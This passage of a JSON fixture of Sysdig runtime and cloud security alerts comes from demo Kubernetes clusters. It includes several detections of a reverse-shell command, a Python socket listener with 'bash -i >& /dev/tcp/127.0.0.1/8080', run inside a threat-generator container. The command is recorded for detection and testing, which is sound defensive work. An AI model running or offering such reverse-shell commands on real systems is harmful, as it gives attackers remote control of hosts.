Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e00a9068fb9185f9aa66c21", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187176710, + "timestampRFC3339Nano": "2024-07-03T18:23:17.18717671Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "cloud": { + "account": { + "id": "414773805239" + }, + "provider": "aws", + "region": "us-east-1" + }, + "event": { + "id": "17dec36048564c002c559dbdad20be41", + "kind": "alert", + "provider": "aws_cloudtrail", + "severity": 7 + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "A description of 
an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Describe Instances", + "ruleset": "Describe Instances - Sysdig AWS Activity Logs", + "version": "36" + }, + "sysdig": { + "category": "remote", + "containerId": "", + "content": { + "fields": { + "container.name": "" + }, + "output": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "policyOrigin": "Sysdig", + "policyVersion": 36, + "ruleName": "Describe Instances", + "ruleTags": [ + "MITRE_T1082_system_information_discovery", + "Cloud", + "AWS", + "AWS_EC2", + "MITRE", + "MITRE_TA0007_discovery", + "MITRE_T1580_cloud_infrastructure_discovery" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "event": { + "category": "remote", + "description": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "type": "policy" + }, + "id": "17dec36048564c002c559dbdad20be41", + "labels": { + "cloudProvider": { + "account": { + "id": "414773805239" + }, + "name": "aws", + "region": "us-east-1" + } + }, + "machineId": "", + "name": "Describe Instances - Sysdig AWS Activity Logs", + "originator": "policy", + "severity": 7, + "source": "aws_cloudtrail", + "timestamp": 1720026926000000000, + "timestampRFC3339Nano": "2024-07-03T17:15:26Z", + "type": "policy" + }, + 
"tags": [ + "MITRE_T1082_system_information_discovery", + "Cloud", + "AWS", + "AWS_EC2", + "MITRE", + "MITRE_TA0007_discovery", + "MITRE_T1580_cloud_infrastructure_discovery" + ], + "threat.technique.id": [ + "T1082" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e051355585daf677e472ed2", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent= proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname= group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + 
"parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Privileged Shell Spawned Inside Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "81618044-80a5-44af-b27a-46acead3a4bc", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "bash -i", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent= proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname= group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + 
"ruleName": "Privileged Shell Spawned Inside Container", + "ruleTags": [ + "container", + "shell", + "SOC2", + "SOC2_CC6.1", + "PCI", + "PCI_DSS", + "PCI_DSS_10.1", + "PCI_DSS_10.2.1", + "NIST", + "NIST_800-171", + "NIST_800-171_3.1.1", + "NIST_800-171_3.1.2", + "NIST_800-171_3.14.6", + "NIST_800-171_3.3.1", + "NIST_800-171_3.3.2", + "NIST_800-53", + "NIST_800-53_AC-17", + "NIST_800-53_AU-6(8)", + "NIST_800-53_AU-2", + "NIST_800-53_AC-2(4)", + "FedRAMP", + "FedRAMP_AC-2(4)", + "FedRAMP_AU-2", + "ISO", + "ISO_27001", + "ISO_27001_A.9.4.4", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.310(b)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.i", + "HITRUST_CSF_01.j", + "HITRUST_CSF_01.n", + "HITRUST_CSF_01.p", + "HITRUST_CSF_01.s", + "HITRUST_CSF_01.y", + "HITRUST_CSF_06.i", + "HITRUST_CSF_09.aa", + "HITRUST_CSF_09.ab", + "HITRUST_CSF_09.ad", + "HITRUST_CSF_09.ae", + "HITRUST_CSF_09.m", + "HITRUST_CSF_09.s", + "GDPR", + "GDPR_32.1", + "GDPR_32.2", + "MITRE", + "MITRE_T1609_container_administration_command", + "MITRE_TA0002_execution", + "MITRE_TA0004_privilege_escalation", + "MITRE_T1068_exploitation_for_privilege_escalation", + "CIS" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e051355585daf677e472ed2", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187466069, + "timestampRFC3339Nano": "2024-07-03T18:23:17.187466069Z", + "type": "policy" + }, + "tags": [ + "container", + "shell", + "SOC2", + "SOC2_CC6.1", + "PCI", + "PCI_DSS", + "PCI_DSS_10.1", + "PCI_DSS_10.2.1", + "NIST", + "NIST_800-171", + "NIST_800-171_3.1.1", + "NIST_800-171_3.1.2", + "NIST_800-171_3.14.6", + "NIST_800-171_3.3.1", + "NIST_800-171_3.3.2", + "NIST_800-53", + "NIST_800-53_AC-17", + "NIST_800-53_AU-6(8)", + "NIST_800-53_AU-2", + "NIST_800-53_AC-2(4)", + "FedRAMP", + "FedRAMP_AC-2(4)", + "FedRAMP_AU-2", + "ISO", + "ISO_27001", + "ISO_27001_A.9.4.4", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.310(b)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.i", + "HITRUST_CSF_01.j", + "HITRUST_CSF_01.n", + "HITRUST_CSF_01.p", + "HITRUST_CSF_01.s", + "HITRUST_CSF_01.y", + "HITRUST_CSF_06.i", + "HITRUST_CSF_09.aa", + "HITRUST_CSF_09.ab", + "HITRUST_CSF_09.ad", + 
"HITRUST_CSF_09.ae", + "HITRUST_CSF_09.m", + "HITRUST_CSF_09.s", + "GDPR", + "GDPR_32.1", + "GDPR_32.2", + "MITRE", + "MITRE_T1609_container_administration_command", + "MITRE_TA0002_execution", + "MITRE_TA0004_privilege_escalation", + "MITRE_T1068_exploitation_for_privilege_escalation", + "CIS" + ], + "threat.technique.id": [ + "T1609" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e03c2766a36e7950883c5c4", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import 
socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "35cf0ae3-a4ed-4c00-831f-f0b7c8489718", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/python3.10", + "proc.name": "python3", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140103", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process python3 with parent 
bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e03c2766a36e7950883c5c4", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187379830, + "timestampRFC3339Nano": "2024-07-03T18:23:17.18737983Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "event": { + 
"id": "17e047935c2a5c6118242ab739a6ba5e", + "kind": "alert", + "provider": "auditTrail", + "severity": 0 + }, + "log": { + "syslog": { + "severity": { + "code": 0, + "name": "emergency" + } + } + }, + "message": "{\"id\":\"17e047935c2a5c6118242ab739a6ba5e\",\"type\":\"audittrail\",\"timestamp\":1720453755887574113,\"timestampRFC3339Nano\":\"2024-07-08T15:49:15.887574113Z\",\"originator\":\"ingestion\",\"category\":\"\",\"source\":\"auditTrail\",\"name\":\"\",\"description\":\"\",\"severity\":0,\"containerId\":\"\",\"machineId\":\"\"}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "category": "", + "containerId": "", + "description": "", + "event": { + "type": "audittrail" + }, + "id": "17e047935c2a5c6118242ab739a6ba5e", + "machineId": "", + "name": "", + "originator": "ingestion", + "severity": 0, + "source": "auditTrail", + "timestamp": 1720453755887574113, + "timestampRFC3339Nano": "2024-07-08T15:49:15.887574113Z", + "type": "audittrail" + } + }, + { + "event": { + "id": "17e047939adc188d8ee67f27d98a5929", + "kind": "alert", + "provider": "auditTrail", + "severity": 0 + }, + "log": { + "syslog": { + "severity": { + "code": 0, + "name": "emergency" + } + } + }, + "message": "{\"id\":\"17e047939adc188d8ee67f27d98a5929\",\"type\":\"audittrail\",\"timestamp\":1720453756939409549,\"timestampRFC3339Nano\":\"2024-07-08T15:49:16.939409549Z\",\"originator\":\"ingestion\",\"category\":\"\",\"source\":\"auditTrail\",\"name\":\"\",\"description\":\"\",\"severity\":0,\"containerId\":\"\",\"machineId\":\"\"}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "category": "", + "containerId": "", + "description": "", + "event": { + "type": "audittrail" + }, + "id": "17e047939adc188d8ee67f27d98a5929", + "machineId": "", + "name": "", + "originator": "ingestion", + "severity": 0, + "source": "auditTrail", + "timestamp": 1720453756939409549, + "timestampRFC3339Nano": "2024-07-08T15:49:16.939409549Z", + "type": "audittrail" + } + }, + { + "agent": { + "id": 
"57228830" + }, + "event": { + "id": "17e047be24848be2ae63efba47ac8869", + "kind": "alert" + }, + "host": { + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk" + }, + "message": "{\"id\":\"17e047be24848be2ae63efba47ac8869\",\"agentId\":57228830,\"containerId\":\"\",\"type\":\"connection\",\"timestamp\":1720453939637554200,\"timestampRFC3339Nano\":\"2024-07-08T15:52:19.637554146Z\",\"labels\":{\"host.hostName\":\"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk\"}}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 57228830, + "containerId": "", + "event": { + "type": "connection" + }, + "id": "17e047be24848be2ae63efba47ac8869", + "labels": { + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk" + } + }, + "timestamp": 1720453939637554200, + "timestampRFC3339Nano": "2024-07-08T15:52:19.637554146Z", + "type": "connection" + } + }, + { + "agent": { + "id": "57841425" + }, + "event": { + "id": "17dec38d1ccc838ed8bd3c0690c2a92e", + "kind": "alert" + }, + "host": { + "name": "gke-gke-aliances-test-pa-default-pool-edcdf365-obof" + }, + "message": "{\"id\":\"17dec38d1ccc838ed8bd3c0690c2a92e\",\"agentId\":57841425,\"containerId\":\"\",\"type\":\"connection\",\"timestamp\":1720027118543078400,\"timestampRFC3339Nano\":\"2024-07-03T17:18:38.543078286Z\",\"labels\":{\"host.hostName\":\"gke-gke-aliances-test-pa-default-pool-edcdf365-obof\"}}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 57841425, + "containerId": "", + "event": { + "type": "connection" + }, + "id": "17dec38d1ccc838ed8bd3c0690c2a92e", + "labels": { + "host": { + "hostName": "gke-gke-aliances-test-pa-default-pool-edcdf365-obof" + } + }, + "timestamp": 1720027118543078400, + "timestampRFC3339Nano": "2024-07-03T17:18:38.543078286Z", + "type": "connection" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec30f432914be51fde04f0a93ff8f", + "kind": "alert" + }, + 
"host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": "{\"id\":\"17dec30f432914be51fde04f0a93ff8f\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"command\",\"timestamp\":1720026578020799700,\"timestampRFC3339Nano\":\"2024-07-03T17:09:38.020799678Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "command" + }, + "id": "17dec30f432914be51fde04f0a93ff8f", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026578020799700, + "timestampRFC3339Nano": "2024-07-03T17:09:38.020799678Z", + "type": "command" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec30ec6c62db90219722f069818ce", + "kind": "alert" + }, + "host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": 
"{\"id\":\"17dec30ec6c62db90219722f069818ce\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"command\",\"timestamp\":1720026575933943300,\"timestampRFC3339Nano\":\"2024-07-03T17:09:35.933943225Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "command" + }, + "id": "17dec30ec6c62db90219722f069818ce", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026575933943300, + "timestampRFC3339Nano": "2024-07-03T17:09:35.933943225Z", + "type": "command" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec311bcc23cdab41a9d1b874f923f", + "kind": "alert" + }, + "host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": 
"{\"id\":\"17dec311bcc23cdab41a9d1b874f923f\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"fileaccess\",\"timestamp\":1720026588650814700,\"timestampRFC3339Nano\":\"2024-07-03T17:09:48.650814682Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "fileaccess" + }, + "id": "17dec311bcc23cdab41a9d1b874f923f", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026588650814700, + "timestampRFC3339Nano": "2024-07-03T17:09:48.650814682Z", + "type": "fileaccess" + } + }, + { + "agent": { + "id": "32212" + }, + "container": { + "id": "397be1762fba" + }, + "event": { + "id": "164806f4c47ad9101117d87f8b574ecf", + "kind": "alert" + }, + "host": { + "name": "qa-k8smetrics" + }, + "message": 
"{\"id\":\"164806f4c47ad9101117d87f8b574ecf\",\"agentId\":32212,\"containerId\":\"397be1762fba\",\"name\":\"nginx-76f9cf7469-k5kf7\",\"timestamp\":1606322948648718268,\"timestampRFC3339Nano\":\"2020-11-25T16:49:08.648718268Z\",\"type\":\"kubernetes\",\"labels\":{\"host.hostName\":\"qa-k8smetrics\",\"kubernetes.cluster.name\":\"demo-env-prom\",\"kubernetes.namespace.name\":\"nginx\",\"kubernetes.pod.name\":\"nginx-76f9cf7469-k5kf7\"}}", + "orchestrator": { + "cluster": { + "name": "demo-env-prom" + }, + "namespace": "nginx", + "resource": { + "name": "nginx-76f9cf7469-k5kf7" + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ], + "ruleset": "nginx-76f9cf7469-k5kf7" + }, + "sysdig": { + "agentId": 32212, + "containerId": "397be1762fba", + "event": { + "type": "kubernetes" + }, + "id": "164806f4c47ad9101117d87f8b574ecf", + "labels": { + "host": { + "hostName": "qa-k8smetrics" + }, + "kubernetes": { + "cluster": { + "name": "demo-env-prom" + }, + "namespace": { + "name": "nginx" + }, + "pod": { + "name": "nginx-76f9cf7469-k5kf7" + } + } + }, + "name": 